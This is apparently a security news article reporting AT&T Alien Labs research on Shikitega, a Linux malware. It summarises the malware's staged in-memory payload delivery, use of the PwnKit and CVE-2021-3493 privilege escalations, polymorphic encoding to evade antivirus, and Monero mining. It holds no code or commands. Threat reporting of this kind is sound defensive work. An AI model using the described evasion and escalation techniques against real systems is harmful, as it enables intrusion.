Shikitega is a brand-new piece of stealthy Linux malware that uses a multi-stage infection chain to infiltrate endpoints and IoT devices…depositing further payloads.
In new research released last Tuesday, AT&T Alien Labs stated that an attacker “may take complete control of the system, in addition to the cryptocurrency miner that will be executed and set to persist.”
Along with BPFDoor, Symbiote, Syslogk, OrBit, and Lightning Framework, the finding adds to a growing list of other Linux malware that has recently been discovered in the wild.
Shikitega’s capacity to download next-stage payloads from a command-and-control (C2) server and execute them instantly in memory makes it elusive, while the precise mechanism by which the first compromise is accomplished is still unknown.
By exploiting CVE-2021-4034 (also known as PwnKit) and CVE-2021-3493, privilege escalation is made possible, allowing the adversary to take advantage of the elevated permissions to fetch and run the final stage shell scripts with root privileges to establish persistence and deploy the Monero crypto miner.
To further evade detection, the malware’s operators use a “Shikata ga nai” polymorphic encoder to make it harder for antivirus engines to find it and take advantage of reliable cloud services for C2 activities.
Shikitega is also a sign of a pattern in which bad actors are broadening the scope of their attacks to target the Linux operating system, which is widely used on servers and cloud platforms worldwide. This tendency has led to an increase in LockBit and Cheerscrypt ransomware infestations.
The introduction of these new Linux ransomware families closely correlates to […] a 75% rise in ransomware attacks targeting Linux systems in the first half of 2022 compared to the first half of 2021, according to Trend Micro’s 2022 Midyear Cybersecurity Report. Threat actors keep looking for novel ways to spread malware so they can evade detection, according to Ofer Caspi, an AT&T Alien Labs researcher.
Shiketega malware employs a polymorphic encoder to deliver its payload in stages, each revealing only a portion of the complete payload.